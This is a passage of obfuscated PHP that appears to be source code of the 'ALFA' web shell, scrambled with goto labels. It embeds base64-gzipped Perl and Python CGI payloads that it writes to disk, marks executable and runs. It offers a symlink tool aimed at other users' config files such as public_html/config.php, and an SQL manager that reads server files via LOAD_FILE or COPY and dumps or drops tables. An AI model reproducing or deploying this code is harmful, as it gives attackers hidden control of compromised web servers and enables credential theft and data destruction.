CC+qkqVCNLYRTJCwUUolplkOhNVaZmW09uJsI/+s6DLUlo5nx3A5ejkmLrJRfSePonO4z86ql4PmXTgOmlP5Uswa97weylL6V23vs/F7No0OIgtxNRPIdpDeLRNwEuA5vmHBRevlgDuyr0rA521w2OtKnNzgPOIy5oA9S0t0xn6DzIRkHDBk2PHAOoPKW0gAX3Zm8GX0emCeixVgUJqPBoSutTAAvgRLJ/8b5r89AstGYH5jUky9TOzB+A+A4S+SNoOlB0r4cX7NBNshbra2EOohvOcQdNwZAiel2aFyL4EAXyGAdlrYzKKMSa6UW8EZUyaYEfev8Jmi6BZAfKz5qrBtGWZ4E9SZ6Vr913ojeBSnMlmCBAkWmHG3E3774z8CDAu6MOoF5FOnbwxxWALiLKUTUTPXzoeYA0V36Oh5pa0FlaTT3ONPtVCJcCNI5QKAHNqwkM2CPjhopWFrho6gz/twadsdx+79PujpPHfPqa1qv4wwnGIhnGbFZp0ybAmVprrig88YFnphsTHxdB42A8Gz3tbnq2lGNS2TwbZ+I+c1eAIGdJGiR8bkvEFO6QAS3Q+m7f2wmtnh1Eurg68Ttsc/nNbz8UjQYH+5lncOikZlqgBiGLvvz6do+veDQWN0ahrKLtIulJ2vbTZ8aD5H/myrl8GJzwOr8/up73fBI0deK5RXhwbXRDltZRraphoy0cTJynKiDgAfbwkH4cD7RXX8jFwm52z/eDAgYZIbQMLIqh1MQIiv/W3JYwxbWf8N1vhg5/HXVrrJc8cF4jyjF1Tp9CsH5e64DFGqyHuQX/Ie7Dmmx0FU6vLL+pKVShxUm3IW9ANz7HmsMN+1fI6hbLCmoHjsvpEzA8fwHPaJHjGQ7H4wKtmnuJHWgr1pby+b2cSDvDuxSvrOzloUgQj2tFRZBmQ/Hi13Hdt6CS7bzF3MJKYXuSWnl96RKpPKzq7mXUgLaBRYl83KWvX0+ydBpbsswOfUV9pr6NUQBlfTpWIbhXqP3gRklSGO/xkzajGoi9x32LcskT2S4Y29CxzNcKcBi2JTJXFsijWOERTjGMGg9ndCrfO5BjuhOznTu4KPCPYsEd7nH/KHfIyDydid/6kGJdcCwzzbkat3t1fkjl/9CurNyth0PRP6ybQ9jCdCUnNw5FAtF5/HkV0fR1Ycmk5mi6q9sW1IUBrWGbP0ybVSgDmMpfliNBwU2wvXep3NhNZiZeds4zYaFltAc7UEG1/PzXPhurb53HRtxz0Z9jtnG54ulno0ExmzEyr9h4/OfwDJQeWzEtAiKsrIN7DnT6lKsWX8l7jWify0I7/t9FLk4whMn8DV353FeOTuFOxyN5ArcibnpHbZNbUNFJgi+HdGt1Nb7LjFZIn3goMVL9leX4MIW4rjm7OhW2qaJO4oem39AWs/oj8fjT9vvT8P+Qdz3iuYYnwLbfmtyDKxASffgUj1kL8xFyYhd4bABMXxhgUkzEN+xdgdJJPNJUAxqI9iWRBMJvzBj+9IYZMMaH+BwyWDY/rL5Jgcq/KaEHqnACA3pyaMq3AjU827fsXOJZlQ+Fdiu6l9eul6tw8ntb8KguoiypuW3Z0S1g/bqD7eTer3DpuFUD0Fzf3Fwaas5AwuDCfQv+MaFI4jxVYAhPwHJ4ZsdA==")),'<string>','exec'))"; goto zct_9; Bs8PW: $perl = "#!/usr/bin/perl   -I/usr/local/bandmin" . "\xa" . "use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));"; goto NHXca; Lql6i: if ($_POST["alfa2"] == "sympy") { goto hnlp1; hnlp1: $cginame = "pysymlink.alfa"; goto KGOTj; dLYyv: $lang = "python"; goto JMtXW; KGOTj: $source = $py; goto dLYyv; JMtXW: } goto beFqR; vRkFC: $lang = "perl"; goto Lql6i; C5ioi: $source = $perl; goto vRkFC; ZuD3A: alfacgihtaccess("cgi"); goto Bs8PW; Aprwr: @chmod($cginame, 0755); goto XnaGI; beFqR: @__write_file($cginame, $source); goto Aprwr; zct_9: $cginame = "symperl.alfa"; goto C5ioi; ekKg_: @mkdir("cgialfa", 0755); goto a8LPj; a8LPj: @chdir("cgialfa"); goto ZuD3A; Ya7an: $resource = alfaEx("{$lang} {$cginame} {$sympath}", false, true, true); goto tJTcG; CUPvn: $sympath = alfaMakePwd(); goto ekKg_; T8qCL: } goto n77rY; BCTc0: alfahead(); goto lVFYV; lVFYV: AlfaNum(9, 10); goto lCIzh; K33Os: echo "</div>"; goto p8BGD; n77rY: if (isset($_POST["alfa4"]) && $_POST["alfa4"] == "SymFile") { if (function_exists("symlink") || _alfa_can_runCommand(true, true)) { goto foYFe; JtPlr: $path = $_POST["alfa5"]; goto SjeaK; foYFe: AlfaNum(9, 10); goto oVCFs; oVCFs: echo __pre() . "\xd\xa<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g('symlink',null,null,null,null,'SymFile',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">\xd
<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />\xd
<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
<p><input type="submit" value=" " name="symlink" /></p></form></center>"; goto JtPlr; SjeaK: $symname = $_POST["alfa6"]; goto p2GRq; p2GRq: $solevisible58 = $_POST["alfa7"]; goto rTkTk; rTkTk: if ($solevisible58) { goto v1Rkn; lBDRm: alfacgihtaccess("sym", $sym_dir, $symname); goto VpdQf; EwuFM: @mkdir($sym_dir, 0777, true); goto lBDRm; VpdQf: _alfa_symlink("{$path}", "{$sym_dir}/{$symname}"); goto fZ60I; OK5Wj: echo "<center><b><font color="white">Click >> </font><a target="_blank" href="" . $sym_dir . "" ><b><font size="4">" . $symname . "</font></b></a></b></center>"; goto xpa4g; fZ60I: echo __pre(); goto OK5Wj; tYe6h: $rand_dir = $new_name . rand(111, 9999); goto H75qe; H75qe: $sym_dir = "alfasymlinkphp/" . $rand_dir . "/"; goto EwuFM; v1Rkn: $new_name = str_replace(".", "_", basename($symname)); goto tYe6h; xpa4g: } goto v6lxQ; v6lxQ: } else { echo "<center><pre class=ml1 style='margin-top:5px'><b><font color="#FFFFFF">[+] Symlink Function Disabled !</b></font></pre></center>"; } } goto S3_Qf; p8BGD: alfafooter(); goto bSj7Y; bSj7Y: } goto Ixta2; zLeDO: function alfaWriteTocgiapi($name, $source) { goto iBmDm; QTrV9: @mkdir("alfacgiapi", 0755); goto Mp9y0; Mp9y0: __write_file("alfacgiapi/" . $name, __get_resource($source)); goto yoj9D; yoj9D: @chmod("alfacgiapi/" . $name, 0755); goto IxFM9; iBmDm: @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); goto QTrV9; IxFM9: } goto QhCss; JWRSz: function alfalogout() { unset($_SESSION["AlfaUser"], $_SESSION["AlfaPass"]); echo "<center><font color='red'>Logout...</font></center>"; } goto d6RZM; pMl2A: function alfaupdatepath() { if ($_POST["path"] != '') { $_SESSION[__LAST_CWD__] = $_POST["path"]; } echo $_SESSION[__LAST_CWD__]; } goto DQTnU; Ixta2: function alfasql() { goto kVCQ2; cj9Iu: if (isset($db) && $db->link) { goto aRqU4; iA0Xh: echo "</table></form><br/>"; goto rVeOp; rVeOp: if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit="fs('3',this.f.value);return false;"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>"; } } goto CxNJX; aRqU4: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto rZY4n; rZY4n: if (!empty($_POST["sql_base"])) { goto kw0QS; lS3Qb: echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick="fs('4');" class='button'> <input type='button' value=' Drop ! ' onclick="fs('5');" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>" . ($dumpStatus ? "<p><a class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'dump.sql', 'download')"><font color="#0F0">~ Download File ~</font></a></p>" : '') . "</td><td style='border-top:2px solid #666;'>"; goto lZbAd; R_YII: echo "</form>"; goto aFQDN; F9X3D: $tbls_res = $db->listTables(); goto a9O8W; XQSqb: echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>"; goto F9X3D; lZbAd: if (@$_POST["alfa1"] == "select") { goto FEi2h; jhkiC: echo " of {$pages}"; goto rZyiz; CNkuc: echo "<br><br>"; goto v6y9z; rZyiz: if ($_POST["alfa3"] > 1) { echo " <a href='javascript:void(0);' onclick=fs('1','["" . $_POST["alfa2"] . "","" . ($_POST["alfa3"] - 1) . ""]')>&lt; Prev</a>"; } goto uL1Xx; BEqwf: $_POST["alfa3"]--; goto h1Y9S; HKm4R: $db->query("SELECT COUNT(*) as n FROM `" . $_POST["alfa2"] . "`"); goto mYtHs; TRf4U: $pages = ceil($num["n"] / 30); goto j57rC; AJKn9: if ($_POST["type"] == "pgsql") { $_POST["alfa2"] = "SELECT * FROM `" . $_POST["alfa2"] . "` LIMIT 30 OFFSET " . $_POST["alfa3"] * 30; } else { $_POST["alfa2"] = "SELECT * FROM `" . $_POST["alfa2"] . "` LIMIT " . $_POST["alfa3"] * 30 . ",30"; } goto CNkuc; uL1Xx: if ($_POST["alfa3"] < $pages) { echo " <a href='javascript:void(0);' onclick=fs('1','["" . $_POST["alfa2"] . "","" . ($_POST["alfa3"] + 1) . ""]')>Next &gt;</a>"; } goto BEqwf; FEi2h: $_POST["alfa1"] = "query"; goto jAeEr; h1Y9S: $cache_table = $_POST["alfa2"]; goto AJKn9; jAeEr: $_POST["alfa3"] = $_POST["alfa3"] ? $_POST["alfa3"] : 1; goto HKm4R; mYtHs: $num = $db->fetch(); goto TRf4U; j57rC: echo "<span>" . $_POST["alfa2"] . "</span> ({$num["n"]} records) Page # <input type=text name='alfa3' value=" . (int) $_POST["alfa3"] . ">"; goto jhkiC; v6y9z: } goto Pgm2G; aFQDN: if (@$_POST["alfa1"] == "edit" && !empty($_POST["alfa2"])) { goto xixnl; pN0bk: echo "</table><input type='hidden' name='__ALFADATA' value='" . __ZW5jb2Rlcg(json_encode($data[1] != "0" ? array("__ALFAKEY" => $data[1], "__ALFAKEYVAL" => $data[2]) : $fetch)) . "'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>"; goto a4RX5; wlEZw: echo "<p><div class="txtfont">Table:</div> <font color="#0F0">" . $data[0] . "</font></p>"; goto qgs1r; jpcaL: if ($data[1] != "0") { goto Kc43t; Kc43t: $data[2] = __ZGVjb2Rlcg($data[2]); goto igzX7; igzX7: $data[2] = str_replace(""", '', $data[2]); goto V4fPB; V4fPB: $fetch = $db->fetch($db->query("SELECT * FROM `" . $data[0] . "` WHERE `" . $data[1] . "` = '" . $data[2] . "'")); goto frYNC; frYNC: $fetch["__ALFAKEY"] = $data[1]; goto mZIQB; mZIQB: $fetch["__ALFAKEYVAL"] = $data[2]; goto bR8uY; bR8uY: } else { $d = __ZGVjb2Rlcg($data[2]); $fetch = json_decode($d, true); } goto r38gd; qgs1r: echo "<form onsubmit='fsu(this);return false;'><table border='1'>"; goto jpcaL; r38gd: foreach ($fetch as $key => $value) { goto sX3rX; G6EHJ: $value = htmlspecialchars($value); goto yZFhd; sX3rX: if ($key == "__ALFAKEY" || $key == "__ALFAKEYVAL") { continue; } goto G6EHJ; yZFhd: echo "<tr><td>{$key}</td><td><input name='{$key}' value='{$value}' /></td></tr>"; goto fEzBL; fEzBL: } goto pN0bk; xixnl: $data = explode(":", $_POST["alfa3"]); goto wlEZw; a4RX5: } goto ToRyr; T_MsO: echo "</td></tr>"; goto Mbvju; Pgm2G: if (@$_POST["alfa1"] == "query" && !empty($_POST["alfa2"])) { goto b6Wfx; ijhjQ: $db->query(@$_POST["alfa2"]); goto xp0pC; b6Wfx: $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($_POST["sql_base"]) . "' AND TABLE_NAME = '" . @addslashes($cache_table) . "' AND COLUMN_KEY = 'PRI'")); goto ijhjQ; xp0pC: if ($db->res !== false) { goto wswxO; gbLec: while ($item = $db->fetch()) { if (!$title) { goto tW6Rd; jt93s: echo "</tr><tr>"; goto qoTiI; qoTiI: $line = 2; goto X3QkD; tW6Rd: echo "<tr><th>#</th>"; goto DD10u; MRP_i: reset($item); goto g8R7O; DD10u: foreach ($item as $key => $value) { echo "<th>" . $key . "</th>"; } goto MRP_i; g8R7O: $title = true; goto jt93s; X3QkD: } if ($cache_table != '') { $cacheMsg = "<a href="javascript:void(0);" onclick=fs('2','["" . $cache_table . "","" . (!$prikey["COLUMN_NAME"] ? 0 : $prikey["COLUMN_NAME"]) . "","" . __ZW5jb2Rlcg(json_encode(!$prikey["COLUMN_NAME"] ? $item : $item[$prikey["COLUMN_NAME"]])) . ""]')>Edit</a>"; } else { $cacheMsg = "-"; } echo "<tr class="l" . $line . ""><td>" . $cacheMsg . "</td>"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } goto e36XH; YHBP0: $line = 1; goto gbLec; e36XH: echo "</table>"; goto eyYlu; jqa50: echo "<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">"; goto YHBP0; wswxO: $title = false; goto jqa50; eyYlu: } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } goto CYPmI; CYPmI: } goto R_YII; ToRyr: if (@$_POST["alfa1"] == "update" && !empty($_POST["alfa2"])) { goto cgJv2; cU92l: echo "</table><input type='hidden' name='__ALFADATA' value='" . __ZW5jb2Rlcg(json_encode(isset($data2["__ALFAKEY"]) ? array("__ALFAKEY" => $keyval["__ALFAKEY"], "__ALFAKEYVAL" => $keyval["__ALFAKEYVAL"]) : $data)) . "'><input type='hidden' name='__ALFATBL' value='{$data["__ALFATBL"]}'><input type='submit' value=' '></form>"; goto WwvyR; WwvyR: if (!isset($data2["__ALFAKEY"])) { goto ZWXyV; Nhej1: foreach ($data2 as $key => $value) { goto hghXr; MfUqR: $value = addslashes($value); goto chlLV; hghXr: if ($key == "__ALFATBL" || $key == "__ALFADATA") { continue; } goto MfUqR; chlLV: $where .= "`{$key}` = '{$value}' AND "; goto yfP2U; yfP2U: } goto C7k9W; C7k9W: $where = substr($where, 0, -4); goto SiaxC; ZWXyV: $where = ''; goto Nhej1; SiaxC: } else { $where = "`{$data2["__ALFAKEY"]}` = '" . addslashes($data2["__ALFAKEYVAL"]) . "'"; } goto PE5Hx; Loruf: echo "<form onsubmit='fsu(this);return false;'><table border='1'>"; goto qXRwq; lFsXy: if ($db->error()) { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } else { echo "Success...!"; } goto IGGv9; egn7t: $db->fetch($db->query("UPDATE `{$data["__ALFATBL"]}` SET {$set} WHERE {$where}")); goto lFsXy; aZpli: $keyval = array(); goto w7B76; PE5Hx: $set = substr($set, 0, -1); goto egn7t; KmFRK: foreach ($data as $key => $value) { goto npfFq; cexCX: echo "<tr><td>{$key}</td><td><input name='{$key}' value='{$value}' /></td></tr>"; goto v0bz7; npfFq: if ($key == "__ALFATBL" || $key == "__ALFADATA") { continue; } goto J7dRB; ctpSv: $value = htmlspecialchars($value); goto cexCX; eAkNH: $set .= "`{$key}` = '" . addslashes($value) . "',"; goto ctpSv; J7dRB: if ($data2["__ALFAKEY"] == $key) { $keyval["__ALFAKEY"] = $key; $keyval["__ALFAKEYVAL"] = $value; } goto eAkNH; v0bz7: } goto lyjs3; cgJv2: $data = json_decode($_POST["alfa2"], true); goto AQldU; YXzQ2: $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true); goto aZpli; lyjs3: unset($data["__ALFADATA"]); goto cU92l; w7B76: echo "<p><div class="txtfont">Table:</div> <font color="#0F0">" . $data["__ALFATBL"] . "</font></p>"; goto Loruf; qXRwq: $set = ''; goto KmFRK; AQldU: $alfadata = $data["__ALFADATA"]; goto YXzQ2; IGGv9: } goto g62Ry; a9O8W: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM `" . $value . "`")); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href='javascript:void(0);' onclick="fs('0','" . $value . "')"><span class='mysql_tables' style='font-weight:unset;'>" . $value . "</span></a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small><span style='font-weight:unset;' class='mysql_table_count'>({$n["n"]})</span></small>") . "</nobr><br>"; } goto lS3Qb; kw0QS: $db->selectdb($_POST["sql_base"]); goto XQSqb; g62Ry: if ($_POST["alfa1"] != "edit" && $_POST["alfa1"] != "update") { goto sbaF3; NbNH5: echo $_POST["alfa1"] != "loadfile" ? htmlspecialchars($_POST["alfa2"]) : ''; goto c09yV; sbaF3: echo "<p>Query:</p><form onsubmit='fs(this);return false;'>\xd\xa<input type='hidden' name='alfa1' value='query'/>\xd\xa<textarea name='query' style='width:100%;height:100px'>"; goto NbNH5; c09yV: echo "</textarea><p><center><input type=submit value=' '></center></p></form>"; goto U6Y3o; U6Y3o: } goto T_MsO; Mbvju: } goto iA0Xh; CxNJX: if (@$_POST["alfa1"] == "loadfile") { $file = $db->loadFile($_POST["alfa2"]); echo "<pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } goto XsGZI; XsGZI: } else { echo htmlspecialchars($db->error()); } goto xRneE; kVCQ2: if (!isset($_POST["sql_host"])) { goto Hw03_; nIijv: $_POST["sql_login"] = $_SESSION["sql_login"]; goto LnZKb; LnZKb: $_POST["sql_pass"] = $_SESSION["sql_pass"]; goto k_rmI; Hw03_: $_POST["sql_host"] = $_SESSION["sql_host"]; goto nIijv; k_rmI: $_POST["sql_base"] = $_SESSION["sql_base"]; goto doiHY; doiHY: } goto ibgbH; sZFW2: echo "</td>
\xa<td><input type='submit' value=' '></td>
\xa<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> <div class="txtfont">count the number of rows</div></td>
\xa</tr>
\xa</table>\xd
<script>mysql_cache['host']='" . addslashes($_POST["sql_host"]) . "';mysql_cache['user']='" . addslashes($_POST["sql_login"]) . "';mysql_cache['pass']='" . addslashes($_POST["sql_pass"]) . "';mysql_cache['db']='" . addslashes($_POST["sql_base"]) . "';mysql_cache['charset']='" . addslashes($_POST["charset"]) . "';mysql_cache['type']='" . addslashes($_POST["type"]) . "';mysql_cache['count']='" . addslashes($_POST["sql_count"]) . "'</script>\xd\xa"; goto cj9Iu; kOepV: if (@$_POST["type"] == "pgsql") { echo "selected"; } goto qqNkY; qqNkY: echo ">PostgreSql</option></select></td>\xd\xa<td><input type='text' name='sql_host' id='db_host' value='" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . "'></td>\xd
<td><input type='text' name='sql_login' id='db_user' value='" . (empty($_POST["sql_login"]) ? '' : htmlspecialchars($_POST["sql_login"])) . "'></td>
<td><input type='text' name='sql_pass' id='db_pw' value='" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "'></td><td>"; goto hGb3_; hGb3_: $tmp = "<input type='text' name='sql_base' id='db_name' value='" . (empty($_POST["sql_base"]) ? '' : htmlspecialchars($_POST["sql_base"])) . "'>"; goto q1B1o; rwEfN: echo ">MySql</option><option value='pgsql' "; goto kOepV; DX3Sq: if (@$_POST["type"] == "mysql") { echo "selected"; } goto rwEfN; eZEx3: $db = new DbClass($_POST["type"]); goto wsYBd; ajV7s: echo "
\xa<div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>" . getConfigHtml("all") . "</p></center>\xd\xa<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>\xd
<td><div class="txtfont">TYPE</div></td><td><div class="txtfont">HOST</div></td><td><div class="txtfont">DB USER</div></td><td><div class="txtfont">DB PASS</div></td><td><div class="txtfont">DB NAME</div></td><td></td></tr><tr>
\xa<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : "UTF-8") . "'>\xd\xa<td><select name='type'><option value='mysql' "; goto DX3Sq; ibgbH: class DbClass { public $type; public $link; public $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } break; case "pgsql": goto rzKXv; rzKXv: $host = explode(":", $host); goto usYcZ; usYcZ: if (!$host[1]) { $host[1] = 5432; } goto kBYXY; kBYXY: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto n3V5k; n3V5k: break; goto at5Ay; at5Ay: } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysqli_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysqli_query($this->link, $str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { goto I7ff1; bBufE: switch ($this->type) { case "mysql": return @mysqli_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } goto t_8ox; t_8ox: return false; goto pqzNO; I7ff1: $res = func_num_args() ? func_get_arg(0) : $this->res; goto bBufE; pqzNO: } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysqli_error($this->link); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysqli_set_charset($this->link, $str); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": goto QPBNO; QPBNO: $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '" . addslashes($str) . "';select file from solevisible;"); goto qp215; LdeFM: while ($i = $this->fetch()) { $r[] = $i["file"]; } goto jTMJG; qp215: $r = array(); goto LdeFM; ga2Vs: break; goto sppKH; xx809: return array("file" => implode("\xa", $r)); goto ga2Vs; jTMJG: $this->query("drop table solevisible"); goto xx809; sppKH: } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": goto vIDHe; K9Z2x: $create = mysqli_fetch_array($res); goto ZmAVh; ZsoXL: if (!$head) { if ($fp) { fwrite($fp, ";\xa\xa"); } else { echo ";\xa\xa"; } } goto x7c0_; IxwxO: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto PfJwp; ZmAVh: $sql = $create[1] . ";
"; goto IxwxO; tmhR1: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { if ($v == null) { $item[$k] = "''"; } elseif (is_numeric($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysqli_real_escape_string($this->link, $v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql = "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES 
	(" . implode(", ", $item) . ")"; $head = false; } else { $sql = "
\x9,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto ZsoXL; vIDHe: $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); goto K9Z2x; x7c0_: break; goto T6_xn; U7vZo: $head = true; goto tmhR1; PfJwp: $this->query("SELECT * FROM `" . $table . "`"); goto U7vZo; T6_xn: case "pgsql": goto FReEM; FReEM: $this->query("SELECT * FROM " . $table); goto l4ow2; Zus86: break; goto gZndG; l4ow2: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $item) . ");" . "\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto Zus86; gZndG: } return false; } } goto eZEx3; wsYBd: if (@$_POST["alfa1"] == "dumpfile" || @$_POST["alfa1"] == "droptbl") { goto VDJaX; VDJaX: $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); goto l5EPL; Eqm4s: switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("calfa1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case 